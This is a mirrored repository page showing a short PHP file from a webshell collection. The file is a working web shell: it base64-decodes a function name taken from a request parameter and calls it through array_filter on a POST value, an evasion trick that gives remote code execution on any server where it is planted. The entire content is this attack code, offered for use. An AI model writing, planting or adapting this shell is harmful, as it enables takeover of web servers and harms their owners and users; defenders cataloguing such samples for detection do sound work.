mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
6 lines
112 B
PHP
6 lines
112 B
PHP
|
<?php
|
||
|
$e = $_REQUEST['e'];
|
||
|
$arr = array($_POST['pass'],);
|
||
|
array_filter($arr, base64_decode($e));
|
||
|
?>
|